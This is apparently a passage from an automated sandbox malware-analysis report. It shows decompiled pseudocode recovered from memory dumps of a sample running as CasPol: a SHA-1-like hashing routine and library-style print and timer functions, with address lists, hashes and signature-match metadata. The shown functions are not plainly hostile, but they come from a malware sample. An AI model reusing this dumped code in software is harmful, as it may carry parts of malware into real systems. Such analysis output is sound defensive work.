					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                0x0040bf8e
                                                                0x0040bf92
                                                                0x0040bf94
                                                                0x0040bf94
                                                                0x0040bf97
                                                                0x0040bfb9
                                                                0x0040bfdf
                                                                0x0040c005
                                                                0x0040c027
                                                                0x0040c02e
                                                                0x0040c031
                                                                0x0040c034
                                                                0x0040c03d
                                                                0x0040c043
                                                                0x0040c04a
                                                                0x0040c05b
                                                                0x0040c05e
                                                                0x0040c061
                                                                0x0040c065
                                                                0x0040c067
                                                                0x0040c069
                                                                0x0040c072
                                                                0x0040c075
                                                                0x0040c078
                                                                0x0040c083
                                                                0x0040c089
                                                                0x0040c08b
                                                                0x0040c08b
                                                                0x0040c08e
                                                                0x0040c091
                                                                0x0040c091
                                                                0x0040c096
                                                                0x0040c098
                                                                0x0040c09b
                                                                0x0040c09e
                                                                0x0040c0a4
                                                                0x0040c0a7
                                                                0x0040c0aa
                                                                0x0040c0b3
                                                                0x0040c0b9
                                                                0x0040c0c2
                                                                0x0040c0d1
                                                                0x0040c0d8
                                                                0x0040c0db
                                                                0x0040c0de
                                                                0x0040c0e7
                                                                0x0040c0ea
                                                                0x0040c0ed
                                                                0x0040c105
                                                                0x0040c10c
                                                                0x0040c10e
                                                                0x0040c111
                                                                0x0040c114
                                                                0x0040c11d
                                                                0x0040c124
                                                                0x0040c127
                                                                0x0040c12a
                                                                0x0040c139
                                                                0x0040c140
                                                                0x0040c143
                                                                0x0040c146
                                                                0x0040c14f
                                                                0x0040c159
                                                                0x0040c15c
                                                                0x0040c168
                                                                0x0040c16b
                                                                0x0040c172
                                                                0x0040c175
                                                                0x0040c178
                                                                0x0040c17d
                                                                0x0040c180
                                                                0x0040c189
                                                                0x0040c19a
                                                                0x0040c19d
                                                                0x0040c1a0
                                                                0x0040c1a7
                                                                0x0040c1aa
                                                                0x0040c1ad
                                                                0x0040c1b0
                                                                0x0040c1b2
                                                                0x0040c1b5
                                                                0x0040c1b8
                                                                0x0040c1c1
                                                                0x0040c1c6
                                                                0x0040c1c6
                                                                0x0040c1db
                                                                0x0040c1de
                                                                0x0040c1e1
                                                                0x0040c1e8
                                                                0x0040c1eb
                                                                0x0040c1ee
                                                                0x0040c203
                                                                0x0040c20a
                                                                0x0040c20d
                                                                0x0040c211
                                                                0x0040c214
                                                                0x0040c219
                                                                0x0040c21c
                                                                0x0040c22b
                                                                0x0040c22e
                                                                0x0040c235
                                                                0x0040c238
                                                                0x0040c23b
                                                                0x0040c23e
                                                                0x0040c241
                                                                0x0040c249
                                                                0x0040c257
                                                                0x0040c25a
                                                                0x0040c25d
                                                                0x0040c25d
                                                                0x0040c264
                                                                0x0040c267
                                                                0x0040c26a
                                                                0x0040c272
                                                                0x0040c280
                                                                0x0040c283
                                                                0x0040c28a
                                                                0x0040c28d
                                                                0x0040c290
                                                                0x0040c293
                                                                0x0040c296
                                                                0x0040c29f
                                                                0x0040c2a6
                                                                0x0040c2a6
                                                                0x0040c2ac
                                                                0x0040c2c5
                                                                0x0040c2c8
                                                                0x0040c2cf
                                                                0x0040c2d2
                                                                0x0040c2d5
                                                                0x0040c2e7
                                                                0x0040c2f1
                                                                0x0040c2f4
                                                                0x0040c2fd
                                                                0x0040c300
                                                                0x0040c307
                                                                0x0040c30a
                                                                0x0040c310
                                                                0x0040c323
                                                                0x0040c32a
                                                                0x0040c32d
                                                                0x0040c330
                                                                0x0040c333
                                                                0x0040c33c
                                                                0x0040c33f
                                                                0x0040c352
                                                                0x0040c355
                                                                0x0040c35f
                                                                0x0040c362
                                                                0x0040c364
                                                                0x0040c36d
                                                                0x0040c370
                                                                0x0040c383
                                                                0x0040c389
                                                                0x0040c38c
                                                                0x0040c393
                                                                0x0040c395
                                                                0x0040c398
                                                                0x0040c39b
                                                                0x0040c39e
                                                                0x0040c3a1
                                                                0x0040c3a4
                                                                0x0040c3ad
                                                                0x0040c3b2
                                                                0x0040c3b5
                                                                0x0040c3b5
                                                                0x0040c3c8
                                                                0x0040c3cb
                                                                0x0040c3ce
                                                                0x0040c3d5
                                                                0x0040c3d8
                                                                0x0040c3db
                                                                0x0040c3de
                                                                0x0040c3f1
                                                                0x0040c3f4
                                                                0x0040c3ff
                                                                0x0040c402
                                                                0x0040c40e
                                                                0x0040c411
                                                                0x0040c417
                                                                0x0040c41a
                                                                0x0040c41d
                                                                0x0040c424
                                                                0x0040c434
                                                                0x0040c437
                                                                0x0040c43d
                                                                0x0040c440
                                                                0x0040c447
                                                                0x0040c449
                                                                0x0040c44c
                                                                0x0040c44f
                                                                0x0040c452
                                                                0x0040c455
                                                                0x0040c45c
                                                                0x0040c46b
                                                                0x0040c46e
                                                                0x0040c475
                                                                0x0040c478
                                                                0x0040c47b
                                                                0x0040c47e
                                                                0x0040c481
                                                                0x0040c484
                                                                0x0040c487
                                                                0x0040c490
                                                                0x0040c4a1
                                                                0x0040c4a9
                                                                0x0040c4af
                                                                0x0040c4b2
                                                                0x0040c4b4
                                                                0x0040c4b7
                                                                0x0040c4ba
                                                                0x0040c4c7

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                • Instruction ID: cf0ae680082bb92ded5da439ca895811eadb995fb834007ffe077b633fc3d0ec
                                                                • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                • Instruction Fuzzy Hash: 85021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			E0162B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x16ff7a8);
				E0167D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0167D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0166D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0166F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0167DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0166B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0166B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0166E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0166A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                0x0162b171
                                                                0x0162b171
                                                                0x0162b171
                                                                0x0162b171
                                                                0x0162b171
                                                                0x0162b176
                                                                0x0162b17b
                                                                0x0162b180
                                                                0x0162b186
                                                                0x0162b18f
                                                                0x0162b198
                                                                0x0162b1a4
                                                                0x0162b1aa
                                                                0x01684802
                                                                0x01684802
                                                                0x01684805
                                                                0x0168480c
                                                                0x0168480e
                                                                0x0162b1d1
                                                                0x0162b1d3
                                                                0x0162b1de
                                                                0x0162b1de
                                                                0x01684817
                                                                0x0168481e
                                                                0x01684820
                                                                0x01684822
                                                                0x01684822
                                                                0x01684824
                                                                0x01684824
                                                                0x0168482a
                                                                0x00000000
                                                                0x00000000
                                                                0x01684835
                                                                0x0168483a
                                                                0x0168483d
                                                                0x0168483f
                                                                0x01684842
                                                                0x01684842
                                                                0x01684842
                                                                0x01684846
                                                                0x0168484c
                                                                0x0168484e
                                                                0x01684851
                                                                0x01684851
                                                                0x01684853
                                                                0x01684854
                                                                0x01684854
                                                                0x01684858
                                                                0x0168485a
                                                                0x0168485a
                                                                0x0168485d
                                                                0x0168485f
                                                                0x01684861
                                                                0x01684861
                                                                0x01684866
                                                                0x0168486b
                                                                0x0168486e
                                                                0x01684871
                                                                0x01684876
                                                                0x01684876
                                                                0x01684878
                                                                0x0168487b
                                                                0x01684884
                                                                0x01684884
                                                                0x00000000
                                                                0x0168487d
                                                                0x0168487d
                                                                0x01684882
                                                                0x01684889
                                                                0x01684889
                                                                0x0168488f
                                                                0x01684891
                                                                0x016848e0
                                                                0x016848e2
                                                                0x016848e4
                                                                0x016848e4
                                                                0x016848e7
                                                                0x016848e7
                                                                0x016848ed
                                                                0x016848f4
                                                                0x016848f6
                                                                0x01684951
                                                                0x01684951
                                                                0x01684953
                                                                0x01684953
                                                                0x01684956
                                                                0x01684956
                                                                0x01684958
                                                                0x01684959
                                                                0x01684959
                                                                0x0168495d
                                                                0x0168495d
                                                                0x0168495f
                                                                0x0168495f
                                                                0x01684965
                                                                0x01684969
                                                                0x016849ba
                                                                0x016849ba
                                                                0x016849c1
                                                                0x016849c5
                                                                0x016849cc
                                                                0x016849d4
                                                                0x016849d7
                                                                0x016849da
                                                                0x016849e4
                                                                0x016849e5
                                                                0x016849f3
                                                                0x01684a02
                                                                0x00000000
                                                                0x01684a02
                                                                0x01684972
                                                                0x01684974
                                                                0x00000000
                                                                0x00000000
                                                                0x01684976
                                                                0x01684979
                                                                0x01684982
                                                                0x01684983
                                                                0x01684984
                                                                0x0168498b
                                                                0x0168498d
                                                                0x01684991
                                                                0x01684993
                                                                0x01684999
                                                                0x0168499d
                                                                0x016849a2
                                                                0x016849a2
                                                                0x016849a2
                                                                0x01684999
                                                                0x016849ac
                                                                0x00000000
                                                                0x016849b3
                                                                0x016848f8
                                                                0x016848fe
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016848fe
                                                                0x01684895
                                                                0x0168489c
                                                                0x016848ad
                                                                0x016848b2
                                                                0x016848b5
                                                                0x016848b7
                                                                0x016848ba
                                                                0x016848bc
                                                                0x016848c6
                                                                0x016848c6
                                                                0x016848cb
                                                                0x016848d1
                                                                0x016848d4
                                                                0x016848d8
                                                                0x016848d8
                                                                0x00000000
                                                                0x016848d8
                                                                0x016848be
                                                                0x016848c0
                                                                0x00000000
                                                                0x00000000
                                                                0x016848c2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016848c4
                                                                0x00000000
                                                                0x01684882
                                                                0x0168487b
                                                                0x01684904
                                                                0x01684906
                                                                0x00000000
                                                                0x00000000
                                                                0x01684908
                                                                0x0168490e
                                                                0x00000000
                                                                0x00000000
                                                                0x01684910
                                                                0x01684917
                                                                0x01684917
                                                                0x00000000
                                                                0x01684917
                                                                0x0162b1ba
                                                                0x016847f9
                                                                0x016847fc
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016847fc
                                                                0x0162b1c0
                                                                0x0162b1c0
                                                                0x0162b1c3
                                                                0x0162b1cb
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: _vswprintf_s
                                                                • String ID:
                                                                • API String ID: 677850445-0
                                                                • Opcode ID: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                                                                • Instruction ID: 8f74e3fa7af2f58e988d35bf9dcbcaa4d2c2fd370ead91ea9d8f653130d9295d
                                                                • Opcode Fuzzy Hash: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                                                                • Instruction Fuzzy Hash: 7F51B371D1025A8ADF31EF68CC44BAEBBB1AF04710F1142ADD859AB382DB718945CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 76%
                                                                			E0164B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x171d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01647D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E016F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01669E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0166B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0166CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01647D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E016F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0166AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1718628; // 0x0
								_v68 = _t77;
								_t78 =  *0x171862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1718628; // 0x0
							_t116 =  *0x171862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                0x0164b94c
                                                                0x0164b956
                                                                0x0164b95c
                                                                0x0164b95e
                                                                0x0164b964
                                                                0x0164b969
                                                                0x0164b96d
                                                                0x0164b96d
                                                                0x0164b970
                                                                0x0164b974
                                                                0x0164b97a
                                                                0x0164badf
                                                                0x0164badf
                                                                0x0164bae2
                                                                0x0164bae4
                                                                0x0164bae6
                                                                0x0164baf0
                                                                0x01692cb8
                                                                0x0164baf6
                                                                0x0164baf6
                                                                0x0164baf6
                                                                0x0164bafd
                                                                0x0164bb1f
                                                                0x0164bb1f
                                                                0x0164baff
                                                                0x0164bb00
                                                                0x0164bb00
                                                                0x0164bb03
                                                                0x0164bb03
                                                                0x0164bacb
                                                                0x0164bacf
                                                                0x0164bad0
                                                                0x0164bad1
                                                                0x0164badc
                                                                0x0164badc
                                                                0x0164b980
                                                                0x0164b980
                                                                0x0164b988
                                                                0x0164b98b
                                                                0x0164b98d
                                                                0x0164b990
                                                                0x0164b993
                                                                0x0164b999
                                                                0x0164b99b
                                                                0x0164b9a1
                                                                0x0164b9a5
                                                                0x0164b9aa
                                                                0x0164b9b0
                                                                0x0164b9bb
                                                                0x0164b9c0
                                                                0x0164b9c3
                                                                0x0164b9ca
                                                                0x0164b9cc
                                                                0x0164b9cf
                                                                0x0164b9d3
                                                                0x0164b9d7
                                                                0x0164ba94
                                                                0x0164ba94
                                                                0x0164ba98
                                                                0x0164baa3
                                                                0x01692ccb
                                                                0x0164baa9
                                                                0x0164baa9
                                                                0x0164baa9
                                                                0x0164bab1
                                                                0x01692cd5
                                                                0x01692cdd
                                                                0x01692cdd
                                                                0x0164babb
                                                                0x0164babc
                                                                0x0164bac2
                                                                0x0164bac3
                                                                0x0164bac3
                                                                0x0164bac6
                                                                0x00000000
                                                                0x0164b9dd
                                                                0x0164b9dd
                                                                0x0164b9e7
                                                                0x0164b9e7
                                                                0x0164b9ec
                                                                0x0164b9ec
                                                                0x0164b9f1
                                                                0x0164b9f5
                                                                0x0164b9fa
                                                                0x0164ba00
                                                                0x0164ba0c
                                                                0x0164ba10
                                                                0x0164ba10
                                                                0x0164ba12
                                                                0x0164ba18
                                                                0x00000000
                                                                0x00000000
                                                                0x0164bb26
                                                                0x0164bb26
                                                                0x0164ba1e
                                                                0x0164ba1e
                                                                0x0164ba23
                                                                0x0164ba25
                                                                0x0164ba2c
                                                                0x0164ba30
                                                                0x0164ba35
                                                                0x0164ba35
                                                                0x0164ba41
                                                                0x0164ba46
                                                                0x0164ba4c
                                                                0x0164ba50
                                                                0x0164ba54
                                                                0x0164ba6a
                                                                0x0164ba6e
                                                                0x0164ba70
                                                                0x0164ba74
                                                                0x0164ba78
                                                                0x0164ba7a
                                                                0x0164ba7c
                                                                0x0164ba8e
                                                                0x0164ba90
                                                                0x0164ba92
                                                                0x0164bb14
                                                                0x0164bb14
                                                                0x0164bb16
                                                                0x0164bb16
                                                                0x00000000
                                                                0x0164ba7c
                                                                0x0164bb0a
                                                                0x0164bb0d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
